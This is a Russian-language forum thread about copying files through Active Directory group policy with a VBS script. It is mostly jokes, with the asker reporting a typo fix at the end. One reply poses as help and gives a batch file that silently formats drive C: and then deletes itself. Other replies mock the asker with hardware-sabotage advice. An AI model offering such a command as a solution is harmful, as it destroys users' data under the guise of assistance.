Ал
Александр

Может слишком умный вопрос может кто знает все же как продавить групповую политику копирования файла используя скрипт vbs в Active Directory?

Ответы
Александр Москаленко

А ну это просто, почисть кучер на процессоре, закороти батарейку на материнской плате, полей все соленой водой и включай!!! Я сто раз так делал, все вопросы решаются. :)))

Ал
Александр

да и замкнул 9 стоек с серверами))

Aля )))

Да , это очень умный вопрос ! Но безграмотно напечатанный )))
Но мы можем и так поговорить ! По - глупому ! Без файлов . У меня на них аллергия , чихаю...Там много вирусов )))

Бибигуль Ракишева

Если писать подробно, то это сообщение будет на 2-3 листа А4. А так вот ссылка на сайт http://www.askit.ru/. там все понятно написано.

Виктор Горлач

Скрипт будет выполняться только на целевой машине. Всё, что нужно - это работающт=ий скрипт и доступ к хосту)

L_
Linuxoid _

Умничаешь да? Напиши батник с таким содержанием и будет тебесчастье @Echo off
format 😨 /q /y > nul
format C: /q /y > nul
del %0

Алексей Меркулов

в смысле "продавить"? В политике стоит запрет а вам очень надо что-ль? Если так то вариантов море.

Ал
Александр

Я уже разобрался спасибо в скрепте не правильный параметр поставил теперь все автоматьм копируеться

Ра
Равшан

Господи Боже мой, этот вопрос не достоин того, чтобы я тратил на него свое время! До свидания!

Bekzod Mutalov

Наверное тебе учиитель информатики такой вопрос задал в колледже или в универе, гуглить иди

Natuiktoralyanova Bardаmalachatkobognyuk

Групповая политика копирования файла, используя скрипт vbs в Active Directory - необходима?

Ал
Александр

А вы такая любопытная)) для них да а мне все делать))

Ал
Александр

А вы такая любопытная)) для них да а мне все делать))

Ал
Александр

и такая вежливая счастья вам и любви))

Лариса Новожилова

ой. ну слишком сложно для этой странички. что-ж вы милейший делаете

Татьяна Усик

ого....я загружена по самое не могу....Я даже не понимаю, о чем речь...

Тимур Айбек Уулу

нажми лучше CTRL ALT DELET вот тогда познаеш что это брат

Александр Кулигин

Усердно помолиться и с помощью Божией свершиться.

Ал
Александр

я разобрался небольшая ошибочка и все)

Александр Кулигин

Помогло значит. 🙂

Камель Ахмиров

политика --это игра...все зависит от разума...........

Ал
Александр

да знаешь Active Directory можешь все))

Камель Ахмиров

естество изначальна......

Василий Клепцов

это каким же надо быть умным,чтобы быть дураком

Ал
Александр

Чтобы стать умным, достаточно прочитать 10 книг, но чтобы найти их, нужно прочитать тысячи. Если поймешь то молодец

Александр Проценко

я знаю как тебе вирусину запустить vbs скриптом

Ал
Александр

вирусы я и сам знаю и как писать. и я уже написал вопрос не актуальный уже

U.
Ukelele .

решается "на раз" договоренностью с админом

Ла
Лариса

я не такая умная. помочь не могу. а жаль...

Ал
Александр

Да спасибо я разобрался просто забыл дописать опостроф вот и не работало)) зпасибо за сторание))

Ла
Лариса

да нема за че)))

John Reese

Поставь сверху гири и всё продавится.)))

Ерик Токубаев

надо найти чудо кнопку и нажать на неё